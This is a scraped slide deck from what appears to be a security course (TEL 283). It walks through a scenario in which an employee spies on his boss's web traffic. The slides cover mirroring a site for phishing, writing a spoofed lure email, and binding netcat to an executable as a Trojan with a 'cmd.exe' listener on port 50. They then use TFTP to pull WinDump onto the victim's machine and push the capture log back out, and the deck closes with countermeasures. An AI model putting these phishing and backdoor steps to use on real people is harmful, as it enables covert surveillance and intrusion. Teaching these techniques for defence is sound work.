1 / 21

TEL 283

TEL 283. What’s the Boss viewing?. Policy. The Boss established a new policy against surfing the web during work hours Phoenix decides to examine the sites that the Boss is looking at by spying on him. Setup. The networked machines are connected via a switch Private 192.168.1.0 network

durin
Download Presentation

TEL 283

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript


  1. TEL 283 What’s the Boss viewing?

  2. Policy • The Boss established a new policy against surfing the web during work hours • Phoenix decides to examine the sites that the Boss is looking at by spying on him

  3. Setup • The networked machines are connected via a switch • Private 192.168.1.0 network • Boss’ IP: 192.168.1.5 • Phoenix’s IP: 192.168.1.6

  4. The Plan • Monitor traffic to and from the Boss’ machine • How “loud” should this approach be? • Loud/noisy means that could trigger alarms of IDS/IPS systems • Might be reasons to launch a noisy attack • Provide a distraction to another attack • Sometimes it’s the only way to monitor traffic • Since a single host’s traffic is the target, ARP poisoning, MAC spoofing or MAC flooding will not be done

  5. Viewing Switched Network Traffic • “Loud” methods • Gratuitous ARP for individual hosts • ARP Poisoning • MAC spoofing • MAC flooding • SPAN • Port mirroring

  6. Viewing Switched Network Traffic • Gratuitous ARP • Unsolicited ARP • Protocol allows for it, without checking for the ARP request (stateless!) • ARP reply sent out associating the target’s IP with the collector’s MAC address • Spoof the MAC of the gateway • Collector replies to ARP requests for the gateway’s MAC • Switch will see the router’s MAC address on both switch ports will send outbound traffic to both ports • MAC flooding • Overwhelm the switch’s MAC table • Causes the switch to “failover” into hub mode • MACOF (http://monkey.org/~dugsong/dsniff/)

  7. Quieter method • Capture the traffic on the target host itself • Plant WinPCap and Trojan Horse on the host • The trick will be to install the software on the target host • Boss will not blindly install software • Have to convince him it’s something of value to him • The plan consists of a chained series of exploits

  8. The Plan • Copy a web site and host it on Phoenix’s server • Bind Netcat to a legitimate executable file • Send email to boss • Download the free executable • Netcat will also be downloaded and installed • Connect to boss’ machine using Netcat • Use TFTP and download a WinDump program onto boss’ machine • Capture the boss’ network traffic • Analyze captured traffic • Rebuild a jpg image using a hex editor

  9. Phishing Scam • Phoenix locates a site and plans to get his boss to visit a copied version of the site • Lays the groundwork via some social engineering • Tells boss of a site “certificatepractice.com” which offers free CCNA practice exam as a promotional offer • Uses a utility to download and mirror the site • Wget (www.gnu.org/software/wget) • Copy the site recursively to hard drive, with appropriate level of hyperlinks of the 1st page • Will also copy the practice test executable • Phoenix will bind his Trojan to this executable

  10. Binding the Trojan • Trojan wrapper program is used • YAB (Yet Another Binder) • Areyoufearless.com (no longer there, however can get via BitTorrent sites) • Altavista.net • Packetstormsecurity.org • Add Bind File option • Allows Phoenix to bind nc.exe • Will execute nc (asynchronously is possible) • Can add execution parameters when nc starts up • Np 50 –e cmd.exe –L • Registry startup option available (default is no) • Melt stub option • Will remove netcat after execution • Icon can be added to make the install appear legitimate

  11. Setting up the phishing site • Overwrite the original ccna.exe file with the bound Trojan file in the phony site • Register a very similar domain name • “certification-practice.com” • Send an email to victim • Phoenix uses an anonymous e-mailer and spoofs the email header to have the “From:” appear as the real site • www.mail.com • Doesn’t require a “real” email address to register • Victim would have to read the email message headers in order to see the real source domain

  12. Email • Check for spelling and grammatical errors • Offer something free or trial basis • Appeal to greed • Why victim is getting something for nothing • Lower suspicion • Appeal to victim’s sense of self • Self-help tools, adding to success, etc • Brevity • Text of the email contains the link to the site • Appears as the URL of the real site, but the hyperlink is really the phony site • Present the email to the victim • Possibly prepare the victim for the email, adding to the enticement

  13. Obtain the Vic’s IP address • Angry IP Scanner • www.angryziber.com/ipscan/ • Scan IP’s on the network for the IP with port 50 open and listening

  14. Connect to the victim machine • nc to the victim’s machine on port 50 • Verify the connection using ipconfig • Will show the victim machine’s IP in the nc window

  15. Install packet capture software • Use command line utility • nc does not allow for usage of a GUI (Windows) interface • Sysinternals has a TFTP server available • Free • No configuration required • Windows already has a TFTP client! • Windump is downloaded • www.winpcap.org/windump • Placed into the default TFTP server directory (TFPT-Root) • Phoenix sets up a TFTP server on his machine • Using Netcat, Phoenix types tftp –i 192.168.1.6 get windump.exe windump.exe tftp [-i] host [put | get] source destination -i switch use binary transfer

  16. Run Windump • Options • -c count (packets) • -s snaplength (length of packets captured) • -w filename (of captured packets) windump –c 500 –s 1500 –w capture.log • If the victim does not have winpcap installed, Phoenix must transfer and manually install winpcap on victim machine • Windump requires winpcap

  17. Installing winpcap • Phoenix downloads winpcap • Unzips it • TFTP (to victim’s winpcap directory) • Daemon_mgm.exe • NetMonInstaller.exe • Npf_mgm.exe • Rpcapd.exe • Uninstall exe • Execute Npf_mgm.exe –r Daemon_mgm.exe –r NetMonInstaller.exe i

  18. Analyzing the capture log • Using Netcat tftp –I put 192.168.1.6 capture.log • Use a packet analyzer to view the traffic • Wireshark • A review show sites visited by the victim • Includes a GET (HTTP) for a file called “gambling.jpg” • Follow TCP stream • Capture the output as raw data • Use a hex editor (WinHex), if required, to edit the raw data • Remove everything before the actual binary file (HTTP commands, etc) • Leaves just the actual binary of the image • Jpg starts with ÿØÿà

  19. Finale • Anonymous note left on the victim’s desk highlighting the activity • Internet usage policy relaxed the next day

  20. Countermeasures • Phishing • Training! • Spam filters / phishing filters • Trojan horse • Anti-virus software • Latest signatures • However • Organizations will alter the Trojan (for a price) so that it does not match a signature • EliteC0ders (no longer offers this “service”) • Software policy • Sniffing • Port security on switches • Protects against ARP poisoning, MAC spoofing and MAC flooding • IPS • PromiScan • Host based IDS • Cisco Secure Agent • Warns if new application is launching

More Related